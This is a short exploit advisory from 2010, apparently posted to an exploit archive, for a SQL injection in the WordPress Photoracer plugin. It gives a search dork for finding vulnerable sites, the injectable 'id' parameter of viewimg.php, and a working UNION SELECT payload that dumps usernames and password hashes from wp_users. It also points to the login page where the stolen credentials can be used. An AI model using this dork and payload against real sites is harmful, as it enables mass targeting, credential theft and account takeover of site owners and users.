The WordPress Photoracer plugin suffers from a remote SQL injection vulnerability.
e238b5dfa28b995624eb2466abfaedf86b0435096a5ffb9260a569dfdba44e81
============================================================
WordPress v1.0 plugin photoracer SQL Injection Vulnerability
============================================================
#######################################################
# IN THE NAME OF GOD
#
# WORDPRESS v1.0 SQL Injection Vulnerability
#
# Author : HELLBOY
#
# Tested on : Lunix
#
# DATE : 2010-06-14
#
# Email : A68_HELLBOY@yahooL.COM
#
# Dork : inurl:"wp-content/plugins/photoracer/viewimg.php?id="
#
########################################################
# Exploit :
# http://[site]/wp-content/plugins/photoracer/viewimg.php?id={SQLI}
#
# EXAM: http://[site]/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
#
# PAGE LOGIN : http://[site]/wp-login.php
#
#########################################################
# Greetz :
# All members of the Forum WwW.security7.ir
#
#########################################################